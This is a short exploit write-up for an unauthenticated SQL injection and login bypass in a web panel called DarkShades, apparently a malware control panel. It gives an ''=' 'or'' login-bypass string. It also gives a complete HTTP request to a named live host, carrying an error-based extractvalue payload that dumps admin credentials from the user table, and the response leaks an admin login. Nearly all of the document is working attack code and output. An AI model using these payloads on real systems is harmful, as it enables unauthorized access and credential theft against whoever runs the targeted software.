DarkShades Unauthenticated Sql Injection - Malwr

DarkShades Unauthenticated Sql Injection

Date: 2020-04-28

DarkShades Unauthenticated Sql Injection and Login Bypass

Username : '=' 'or'

Password: '=' 'or'

--------------------------------------------

Request:

POST /Dark/zathura/auth.php HTTP/1.1
Host: vandroid.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://vandroid.xyz
Connection: close
Referer: http://vandroid.xyz/Dark/index.php
Cookie: PHPSESSID=499e5435824b3370c5f00e20481226c5
Upgrade-Insecure-Requests: 1

user_id=asd&user_pass=adsd'and extractvalue(1,concat(1,(select concat(clm_userid,0x3a,clm_password) from tbl_user limit 0,1)))-- -

Response:

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/7.2.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 40
Vary: Accept-Encoding
Date: Mon, 27 Apr 2020 21:11:41 GMT
Server: LiteSpeed

XPATH syntax error: 'admin:[email protected]#'

http://vandroid.xyz/Dark/zathura/home.php